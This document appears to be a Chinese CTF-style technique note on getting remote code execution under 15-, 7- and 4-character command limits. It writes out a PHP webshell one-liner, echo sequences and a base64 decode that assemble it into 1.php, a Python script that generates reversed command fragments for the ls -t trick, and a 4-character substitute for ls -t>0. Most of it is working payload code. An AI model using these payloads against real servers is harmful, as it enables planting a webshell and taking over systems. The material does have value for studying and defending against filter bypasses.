限制字符下的RCE
限制字符下的RCE
需要转义的字符:
'<', '>', '(', ')', '[', ']', '$', ';', ' '
15字符限制
RCE = <?php eval($_GET[1]);
# coding:utf-8
# @Auther: Vicr
def filter(rce):
    """Backslash-escape the shell metacharacters listed at the top of the page.

    Each of '<', '>', '(', ')', '$', ';', '[', ']' and the space character in
    *rce* is prefixed with a single backslash; every other character is
    copied through unchanged.

    Args:
        rce: the string to escape.

    Returns:
        The escaped string (same length as *rce* plus one per escaped char).
    """
    needs_escape = set('<>()$;[] ')
    return ''.join('\\' + ch if ch in needs_escape else ch for ch in rce)
执行的命令如下:
# Each echo writes one escaped fragment of the one-liner on line 6 into file 1
# (the first line creates the file, the following ones append); the final
# line renames the assembled file.
echo \<?php>1
echo eval\(>>1
echo \$_GET>>1
echo \[1\]>>1
echo \)\;>>1
mv 1 1.php
7字符限制
<?php phpinfo();
经过base64转换
# Decodes the base64 form of the phpinfo one-liner above into 1.php; this is
# the line that has to be written in short fragments (see the script below).
echo PD9waHAgcGhwaW5mbygpOw==|base64 -d >1.php
将第三行写入即可RCE,主要是要倒序写,因为要配合ls -t
代码如下
#!/usr/bin/python
#7字符RCE
# coding:utf-8
# @Auther: Vicr
import os
import base64
def fun(rce):
    # Split the command string rce into fragments of at most 3 characters.
    # A 3-character window is taken at each step; if it contains a space or a
    # '|', a 2-character window is taken instead and the space/pipe inside it
    # is backslash-escaped.
    #
    # Side effect: the four trailing fragments 'hp', '1.p', '\>' and '\ ' are
    # appended to the module-level ``payload`` list, which this function does
    # not define (it is created under __main__ below). Calling fun() without
    # that global in place raises NameError.
    #
    # Returns the fragments of rce in source order; the caller reverses them.
    list = []  # shadows the builtin ``list`` for the rest of this function
    num = 0
    length = len(rce)
    while num < length:
        res = rce[num: num + 3]
        if ' ' in res:
            # Fall back to a 2-character slice. If the space was the third
            # character of the 3-slice, this 2-slice has no space and is
            # appended unescaped; the space is then handled next iteration.
            res = rce[num: num + 2]
            res = res.replace(' ', '\ ', 5)  # count=5 is moot: slice is <= 2 chars
            list.append(res)
            num += 2
            continue
        if '|' in res:
            # Same 2-character fallback as for the space case, escaping '|'.
            res = rce[num: num + 2]
            res = res.replace('|', '\|', 5)
            list.append(res)
            num += 2
            continue
        list.append(res)
        num += 3
    # Trailing pieces go to the global ``payload`` directly, not to the
    # returned list, so they end up before the reversed fragments in __main__.
    payload.append('hp')
    payload.append('1.p')
    payload.append('\>')
    payload.append('\ ')
    return list
if __name__ == '__main__':
    # Module-level list that fun() appends to as a side effect; it has to
    # exist before fun() is called.
    payload = []
    # Unused: this encodes the literal string 'utf-8', not RCE — presumably a
    # leftover from an earlier version.
    bs64 = base64.b64encode(str.encode('utf-8'))
    RCE = 'echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d' #<?php eval($_GET[1]);
    print(RCE)
    res = fun(RCE)
    # Drain res from its end so payload holds the fragments in reverse order,
    # after the four trailing pieces fun() already appended.
    for i in range(len(res)):
        payload.append(res.pop())
    # Start from an empty output file, since the loop below appends.
    if (os.path.exists('./payload.txt')):
        os.remove('./payload.txt')
    # One line per fragment, prefixed with 'w>'; every fragment other than
    # 'hp' additionally gets two literal backslashes appended.
    for i in range(len(payload)):
        with open('./payload.txt', 'a+') as f:  # reopened on every iteration
            if(payload[i] == 'hp'):
                f.write('w>' + payload[i] + '\n')
                continue
            f.write('w>' + payload[i] + '\\\\' + '\n')
    print("OK")
4字符限制
这里主要记录下ls -t>0这条命令如何替换
# Substitute for `ls -t>0` under the 4-character limit (one command per line).
>f\>
>ht-
>sl
>dir
*>v
>rev
*v>0
